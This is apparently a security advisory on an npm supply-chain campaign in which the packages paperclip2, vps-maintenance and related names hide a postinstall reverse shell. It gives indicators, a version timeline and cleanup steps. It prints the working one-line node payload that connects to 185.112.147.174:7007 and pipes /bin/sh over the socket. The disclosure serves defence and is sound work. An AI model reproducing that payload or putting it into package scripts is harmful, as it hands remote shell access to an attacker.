paperclip2 / vps-maintenance postinstall reverse shell to 185.112.147.174:7007
On 2026-07-04 the OX Research team disclosed npm packages — paperclip2, vps-maintenance, vps-maintenance-paperclip-adapter — published by user srm0rgan that hide a postinstall reverse shell to 185.112.147.174:7007 inside package.json. paperclip2 ships with no JavaScript files at all, defeating static scanners that only inspect .js. Two follow-on names — paperclip-host-utils and vps-adapter-core — landed 2026-07-07 and joined the same GHSA takedown.
- Detected by
- OX Security
- Also known as
- paperclip2 reverse shell
- Ecosystems
- npm
- Packages tracked
- 5
What happened
On 2026-07-04 OX Research disclosed a small but noteworthy npm supply-chain campaign: three packages published by the srm0rgan maintainer account (email srm0rgan@proton.me) all carry a single-line postinstall script that opens a raw TCP connection to 185.112.147.174:7007 and pipes it into /bin/sh.
The evasion — no JavaScript at all
paperclip2@1.0.0 was published 2026-07-04 12:21 UTC and contains one file: package.json. There is no index.js, no source directory, and no build output. The malicious behaviour is entirely inside the scripts.postinstall field:
`` node -e "const c=require('net').connect(7007,'185.112.147.174'); const p=require('child_process').spawn('/bin/sh',[]); c.pipe(p.stdin);p.stdout.pipe(c);p.stderr.pipe(c);" ``
Many npm malware scanners default to analysing .js files inside the tarball. A package that has no .js code passes those checks trivially — the reverse shell only becomes visible if the scanner also parses package.json scripts.
Typosquat context
vps-maintenance (0.1.0, 2026-07-04) and vps-maintenance-paperclip-adapter (0.1.0 clean 2026-07-03, then poisoned 0.1.1/0.1.2 on 2026-07-03/07-04) present themselves as adapters for the legitimate open-source Paperclip AI orchestration platform (@paperclipai/* on npm, paperclipai/paperclip on GitHub). The README for vps-maintenance-paperclip-adapter is a plausible product page describing SSH-based VPS maintenance commands run from the Paperclip UI, including an install snippet (POST /api/adapters/install { "packageName": "vps-maintenance-paperclip-adapter" }). None of that functionality exists — the postinstall runs before any of it can matter.
Version rollout timeline
- 2026-07-03 10:48 UTC —
vps-maintenance-paperclip-adapter@0.1.0published (clean; nopostinstall) - 2026-07-03 11:27 UTC —
vps-maintenance-paperclip-adapter@0.1.1published with the reverse-shellpostinstall - 2026-07-04 12:14 UTC —
vps-maintenance-paperclip-adapter@0.1.2republishes the same payload - 2026-07-04 12:19 UTC —
vps-maintenance@0.1.0published with the same reverse shell - 2026-07-04 12:21 UTC —
paperclip2@1.0.0published with the same reverse shell (no.jsfiles)
Each republish shares the same maintainer, the same signature keyid, and the same C2 destination — this is one operator refining the packaging (README, scope hunt) between attempts.
IOCs
- Command-and-control:
185.112.147.174:7007(raw TCP, no TLS,/bin/shbidirectional pipe) - Maintainer:
srm0rgan/srm0rgan@proton.me - Package integrity hashes (SHA-512, from npm registry):
paperclip2@1.0.0sha512-nAXbGaLpALwzD8GfhfY4wiE9oXBWkpxzILp+1qzISRO6wHunjS3LyZ+TtDls7fk2A8vjfYARyeKTdZTQR1Rmdw==;vps-maintenance@0.1.0sha512-Kwj71je+AYz1+E4g35VVwjStRIL4Xfhk9VqPJ1+yZ3FdKOxCXUpMRAsMJPtRr2/8paaw/v99hrnRMqc1IJsjjg==;vps-maintenance-paperclip-adapter@0.1.2sha512-rJeZY0RmjzPFgRjID3xLVTCLLGuYkBQ/k1RB5n/Dy74U3NYRBm4ML3n1US6sWVB2wdIZILEE9LMuvRlmwMbvpg==
Affected packages (5)
- npm
paperclip-host-utils1.0.01.0.21.0.31.0.41.0.51.0.61.0.7 - npm
paperclip21.0.0 - npm
vps-adapter-core1.0.01.0.11.0.2 - npm
vps-maintenance0.1.0 - npm
vps-maintenance-paperclip-adapter0.1.10.1.2
Impact
- Any host that ran
npm installonpaperclip2,vps-maintenance, orvps-maintenance-paperclip-adapter@0.1.1/0.1.2executed a/bin/shreverse shell to185.112.147.174:7007 paperclip2contains a single file —package.json— with the maliciouspostinstallscript. There are no.jsfiles to lint, so any scanner that only inspects JavaScript source code will pass the package clean- The
vps-maintenance*packages plausibly typosquat the Paperclip AI orchestration platform ecosystem (see@paperclipai/*scope on npm) — a developer looking for a "VPS maintenance adapter for Paperclip" would find these three names credible vps-maintenance-paperclip-adapter@0.1.0(2026-07-03) was clean — the postinstall reverse shell only landed on0.1.1published minutes later on 2026-07-03, then a re-cut0.1.2on 2026-07-04. Anyone who upgraded from0.1.0to0.1.1/0.1.2was hit- The 2026-07-07 GHSA batch added two follow-on names —
paperclip-host-utils@1.0.0–1.0.7(7 versions published in the same 40-minute burst 2026-07-07 11:37–12:14 UTC) andvps-adapter-core@1.0.0–1.0.2(three versions in a 25-minute burst 2026-07-07 08:37–09:00 UTC). GHSA advisoriesGHSA-m74w-fv2m-jcvwandGHSA-hvxm-858v-vhw9classify both as CWE-506 Embedded Malicious Code. The rapid-fire republishing pattern matches the July 3–4 vps-maintenance rollout — same operator, refining the packaging
What to do
- 1Remove
paperclip2,vps-maintenance, andvps-maintenance-paperclip-adapterfrompackage.jsonand every lockfile; deletenode_modulesand reinstall - 2On any Linux/macOS build host that resolved these packages: check for processes listening/connected on port 7007 (
ss -tunp | grep 7007,lsof -i :7007) and kill any/bin/shspawned bynode - 3Egress-block
185.112.147.174at your firewall and add it to your IOC feed; check outbound proxy/NetFlow logs for connections to that IP:7007 during the exposure window - 4Rotate every credential accessible from any build host that installed these packages — SSH keys, cloud CLI tokens, npm/GitHub tokens, environment variables loaded by the shell
- 5Add a lockfile guard for these three names in your private mirror and CI — Verdaccio/Nexus/Artifactory may still serve the malicious tarballs from cache even after the public yank
- 6If you were legitimately evaluating the Paperclip AI orchestration platform, the correct scope is
@paperclipai/*on npm —paperclip2and thevps-maintenance*names are not affiliated with that project
References
- OX SecurityBeware of Paperclip2: Malicious npm Packages Foundox.security
- npmpaperclip2 on npmnpmjs.com
- npmvps-maintenance on npmnpmjs.com
- npmvps-maintenance-paperclip-adapter on npmnpmjs.com
- GitHubGHSA-m74w-fv2m-jcvw — paperclip-host-utils malware advisorygithub.com
- GitHubGHSA-hvxm-858v-vhw9 — vps-adapter-core malware advisorygithub.com
- GitHubGHSA-27r8-2rjc-75rv — paperclip2 malware advisorygithub.com
- GitHubGHSA-p3g7-2j36-j99x — vps-maintenance-paperclip-adapter malware advisorygithub.com
- GitHubGHSA-qc5h-v3rf-5x95 — vps-maintenance malware advisorygithub.com